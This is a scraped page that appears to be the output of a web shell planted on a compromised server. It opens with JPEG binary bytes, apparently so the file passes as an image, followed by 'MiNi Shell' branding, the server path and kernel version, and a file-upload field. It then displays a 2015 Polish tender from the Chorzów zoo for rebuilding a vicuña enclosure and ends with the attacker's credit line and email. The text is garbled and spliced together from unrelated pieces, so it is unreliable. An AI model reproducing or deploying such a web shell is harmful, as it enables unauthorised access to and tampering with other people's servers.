JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150723/187326-N-2015.html

<p class="kh_header"><b>Chorzów: Przebudowa  budynku wikunii i wybiegu celem dostosowania do nowej ekspozycji</b><br>
<b>Numer ogłoszenia: 187326 - 2015; data zamieszczenia: 23.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Śląski Ogród Zoologiczny , ul. Promenada Gen. Jerzego Ziętka 7, 41-501 Chorzów, woj. śląskie, tel. 666 031 496.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoo.silesia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu wojewódzkiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  budynku wikunii i wybiegu celem dostosowania do nowej ekspozycji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przebudowa  budynku wikunii i wybiegu celem dostosowania do nowej ekspozycji:

I BUDYNEK

1.	Wymiana okien od strony wybiegu z drewnianych na PCV nieotwierane                   o wysokości 1,4 m i szerokości 1,6 m ( okna widokowe)- 2 sztuki, powiększenie istniejących otworów okiennych, szyby termoizolacyjne, bezpieczne w kolorze białym, kolor futryn brąz.
2.	Wymiana istniejących okien drewnianych w boksach na PCV jednodzielne otwierane do środka i uchylne w pionie  o szerokości 1,50 m i wysokości 0,85 m. 2 szt oraz w korytarzu paszowym 1,10 m x 0,55 m 1 szt kolor futryn brąz.
3.	Wymiana drzwi zewnętrznych wraz z ościeżnicami na stalowe ocieplane, wejściowe  do budynku pełne 1 szt , wejściowe na wybiegi 2 szt  stalowe, ocieplane z wizjerem na wysokości 1,4 m o wymiarach 15 x 25 cm z szybą bezpieczną, ryglem od zewnątrz i od wewnątrz i zasuwą  na kłódkę - w przypadku drzwi 2 szt na wybieg zmniejszenie światła drzwi do szerokości 90 cm- zamurowania, kolor drzwi brązowy.
4.	Zamurowanie dwóch otworów drzwiowych.
5.	Demontaż posadzek z podkładów kolejowych i ich utylizacja.
6.	Wyburzenie części  ścian w celu powiększenia pierwszego boksu.
7.	Podmurowanie ścian zewnętrznych i wewnętrznych z wyszpałdowaniem na mocnej zaprawie cementowej ( ochrona przed gryzoniami).
8.	W dużym boksie widokowym wewnętrzne tynki akrylowe mozaikowe kolor brązowo- rudy do ustalenia z inwestorem z zamocowaniem punktowo półbali okorowanych, impregnowanych preparatem z atestem do stosowania w budynkach inwentarskich  do wysokości ok. 150 cm, w pozostałych boksach uzupełnienie tynków 
9.	Uzupełnienie tynków zewnętrznych i obicie elewacji drewnem od strony wybiegów 2 ściany ( półbale bejcowane w kolorze brązowym,  impregnowane preparatem z atestem do stosowania w budynkach inwentarskich lub deski zakładane na pióro) , a od strony zaplecza 2 ściany pokrycie okładziną klinkierową wg. faktury przyległego budynku
10.	Wymiana instalacji elektrycznej z montażem nowych lamp ( w boksach zwierząt 100 luxów na 1 m2 przy podłodze ), wyłącznikami świetlenia w poszczególnych boksach posadowionymi w korytarzu gospodarczym oraz zegarem sterującym oświetleniem.
11.	Montaż osłon z blachy powlekanej na grzejniki szt. 4.
12.	Wymiana zasuw  doprowadzających wodę fi 40 mm 2 sztuki
13.	Wymiana i rozprowadzenie instalacji wodnej z podłączeniem poideł automatycznych miskowych z pływakiem osłoniętym i otworem spustowym w dnie miski  sztuk 4 z zaworem zamykającym każde poidło (zawór w korytarzu) oraz zlewem nierdzewnym gastronomicznym  montaż w dwóch punktach budynku zaworów kulowych czerpalnych 3-4 cala, z możliwością podpięcia szybkozłączki do węża ogrodowego
14.	Montaż termy elektrycznej 10 litrowej nad zlewem gospodarczym
15.	Wykonanie kanalizacji wszystkich boksów, z montażem odpływów liniowych na całej długości boksów od strony korytarza paszowego, poziomowanie posadzki ze spadkiem do kratek odwodnienia.
16.	Kratki odwodnienia zamontowane na rynienkach za pomocą śrub 
17.	Podłączenie do zewnętrznej instalacji kanalizacyjnej poprzez osadnik umieszczony w korytarzu paszowym lub poza budynkiem.
18.	Zamurowanie części ścian przy likwidowanych paśnikach oraz wnęk w korytarzu 
19.	Montaż elektrycznych wentylatorów wywiewnych 4 szt. z możliwością ustawienia sterowania czasowego  wywiewu.
20.	Wstawienie w istniejących otworach ścian zewnętrznych żaluzji regulujących napływ powietrza. 
21.	Nowa posadzka na korytarzach z betonu zatartego na gładko, a w boksach z betonu na gładko w kolorze dopasowanym do kolorystyki ścian.
22.	Wymiana drzwi boksowych otwieranych do środka boksu 1 szt zamykających istniejący korytarz paszowy, wymiana przesuwnych przegród pomiędzy boksami  2 szt na rolkach z łożyskiem, wysokość całkowita około 180 cm, do wysokości  1,4 m pełne z wypełnieniem ze sklejki wodoodpornej powlekanej brązowej , a powyżej z prętów stalowych fi 8 mm z prętami prowadzącymi sztywnymi łamanymi, drzwi do boksów : 2 szt wymiana istniejących otwierane do środka stalowo- drewniane  (rama stalowa + sklejka + pręty ), ramy wszystkich drzwi i przegród boksów  stalowe, malowane proszkowo w kolorze brązowym
23.	Malowanie pomieszczeń dwóch mniejszych boksów oraz korytarza i całości sufitów  farbami akrylowymi zmywalnymi

II WYBIEG

1. Demontaż 5 przęseł i słupków ogrodzenia zewnętrznego i ich ponowny montaż wraz z przesunięciem słupków w połowie istniejącego podwórka hodowlanego. 
2. Obcięcie przęseł ogrodzenia dużego wybiegu  do wysokości 1,4 m wraz z przeróbką bramy wjazdowej na wybieg, na bramie blokady w pionie oraz 2 zasuwy na kłódki.
3. Czyszczenie i malowanie antykorozyjne ogrodzenia. 
4. Częściowa likwidacja części barierek dla zwiedzających ( przy szybach i ogrodzeniu pokrytym półbalami, montaż barierek po ich oczyszczeniu i pomalowaniu przy bramie wjazdowej z zachowaniem możliwości wjazdu na wybieg- barierki na zawiasach
5. Wstawienie w ogrodzenie ram szklonych ( materiał inwestora z odzysku) i obłożenie ogrodzenia stalowego pólbalami wraz z montażem poziomych półbali nad szybami, część ram do ponownego zaszklenia.
6. Wykonanie podłączenia wody z rurociągu fi 160 mm poprzez nawiertkę rurą fi 50 mm do basenu niecki o nieregularnym kształcie o średnicy około 4 m i maksymalnej głębokości 0,5 m na wybiegu zewnętrznym montaż zasuwy podziemnej z obudową i skrzynką do zasuwy,  
7. Z niecki odprowadzenie wody do kanalizacji rurą fi 80 z montażem zasuwy podziemnej z obudową i skrzynką do zasuwy
8. Włączenie się do studzienki kanalizacyjnej  
9. Wyprowadzenie zasilania wody do poideł automatycznych 2 sztuki, montaż na ogrodzeniu podwórka z obu stron i zawory odcinające poza zasięgiem zwierząt 
10. Wywóz i utylizacja gruzu oraz ziemi pochodzącej z koryta niecki.
11. Przy ścianie zewnętrznej budynku ułożenie koryt ściekowych odprowadzających wodę z dachu do kanalizacji,  podłoże wysypać z korą i mieszanką kruszywa łamanego wapiennego frakcja 0-4 mm ( dojście do szyby widokowej).
12. Wymiana rynien nad częścią widokową budynku, odprowadzenie wody do kanalizacji, montaż płotków przeciw śniegowych ma dachu
13. Montaż pastucha elektrycznego: - Elektryzator sieciowy bateryjny z automatycznym przepięciem na akumulator w przypadku braku napięcia w sieci. Na całym ogrodzeniu wybiegu po stronie wewnętrznej 2 linie taśmy o szerokości            4 cm  w kolorze brązowym, izolatory do drewna do taśmy 4 cm  ( wysokość montażu linii do uzgodnienia z Inwestorem. W  boksie widokowym 2 linie plecionki na wszystkich ścianach. Przy elektryzatorze montaż sekcjonera (możliwość zasilania osobno wewnętrznego i zewnętrznego pastucha. 
14. Wykonanie osłon drzew. Osłony drzew dwa rodzaje : z wykorzystaniem korzeni    ( materiał inwestora ) i częściowo drewniane ( z desek impregnowanych, malowanych drewnochronem).
15. Zagospodarowanie wybiegu.

III OCZKO WODNE - o kształcie nerki, powierzchni około 12 m2 i maksymalnej głębokości 0,5 m.

1. Wykop w gruncie kat III na maksymalną głębokość 0,75 m.
2. Wyprofilowanie podłoża.
3. Podsypka piaskowa gr.10 cm.
4. Chudy beton gr. 5 cm.
5. Folia gruba basenowa.
      6. Wylewka betonowa grubości 10 cm, zbrojona siatką stalową, ze spadkiem do kraty
          z osadnikiem.
7. Podłączenie basenu do kanalizacji i przyłącza wodnego.
8. Osadzenie w dnie oczka w najgłębszym miejscu kraty otwieranej  ze stali kwasoodpornej z osadnikiem, rama kraty z kątownika ze stali kwasoodpornej OH19N9  o wymiarach wewnętrznych 50 x 50 cm , krata z prętów fi 6 mm                       i oczkiem 20 x 20 mm w świetle.
9. Wyjście z oczka łagodne na utwardzony betonem  teren (plaża) o powierzchni około 10 m2.
10. Oczko wodne i plaża pokryte substancjami plastidur poliestrowymi PS z żywic polimerowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.26.90-4, 45.26.27.00-8, 45.42.11.30-4, 45.23.13.00-8, 45.33.00.00-9, 45.11.10.00-8, 45.26.23.00-4, 45.26.23.10-7, 45.26.25.20-2, 45.31.12.00-2, 45.44.21.00-8, 45.44.22.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 112.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wymagane w kwocie 4.000 zł (cztery tysiące)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli  Wykonawca wykaże, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert ,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  należycie wykonał co najmniej jedną robotę budowlaną o wartości co najmniej 100.000,00 zł netto, polegającą na wykonaniu remontu lub modernizacji budynku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć oświadczenie, że osoba, która będzie pełnić funkcję kierownika robót posiada uprawnienia do kierowania robotami budowlanymi                 w specjalności konstrukcyjno-budowlanej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca winien wykazać, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert ,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  należycie wykonał co najmniej jedną robotę budowlaną o wartości co najmniej 100.000,00 zł netto, polegającą na wykonaniu remontu lub modernizacji budynku;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania wykonawcy (wykonawców występujących wspólnie), o ile ofertę składa pełnomocnik</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany ustaleń niniejszej umowy w stosunku do treści oferty Wykonawcy w następującym zakresie: 
1 wysokości wynagrodzenia w przypadku:
1)	Ograniczenia zakresu prac objętych umową w przypadku stwierdzenia braku konieczności wykonania części zamówienia;
2)	Konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych niż wskazane w przedmiarze robót, czy opisie technicznym                 w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
3) Robót dodatkowych, których nie dało się przewidzieć a które są niezbędne do wykonania zamówienia podstawowego;
      
2 terminu realizacji przedmiotu zamówienia, gdy zmiana jest  spowodowana:  
a. epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym,
b. skrajnie niekorzystnymi warunkami pogodowymi  uniemożliwiającymi wykonywanie prac zewnętrznych (gradobicie,  intensywne opady deszczu lub śniegu, powodzie, upały itp.) potwierdzonymi wpisem do dziennika budowy,
c. trudnościami w nabyciu materiałów lub urządzeń wynikającymi z długotrwałego spadku podaży tych towarów lub innych przyczyn niezależnych od  Stron umowy,  
d. następstwem okoliczności leżących po stronie Zamawiającego, takich jak:  utrudnienia, opóźnienia w przekazywaniu pomieszczeń, zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu, 

e. koniecznością wykonania robót dodatkowych, wpływających na termin wykonania robót objętych niniejszą umową podstawową, 
f. następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia,
g. katastrofą budowlaną.

3  osób przewidzianych do realizacji zamówienia przez Strony w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków, nienależyte wykonywanie obowiązków, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje jak osoby wskazane w ofercie.
4 podwykonawcy, jeżeli podwykonawca nie wykonuje prac z należytą  starannością, uległ likwidacji, doszło do rozwiązania umowy łączącej go              z Wykonawcą.
5   zmiany zakresu części prac powierzonych podwykonawcy w przypadku gdy:
- konieczność powierzenia przez Wykonawcę prac podwykonawcy spowodowana jest rozwiązaniem umów o pracę z pracownikami wykonującymi pracę w danej branży w takiej liczbie, która uniemożliwia realizację prac przez Wykonawcę,
- wprowadzenie nowego podwykonawcy zapewni lepszą realizację danej części zamówienia,
- konieczność powierzenia prac podwykonawcy jest wynikiem zmiany technologii robót lub materiałów,
    Jeżeli zmiana podwykonawcy  albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b Ustawy Pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy Pzp Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.

6.  Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego  oraz przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoo.silesia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Śląski Ogród Zoologiczny, 41-501 Chorzów, Promenada Gen. J. Ziętka 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2015 godzina 10:00, miejsce: Śląski Ogród Zoologiczny, 41-501 Chorzów, Promenada Gen. J. Ziętka 7, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com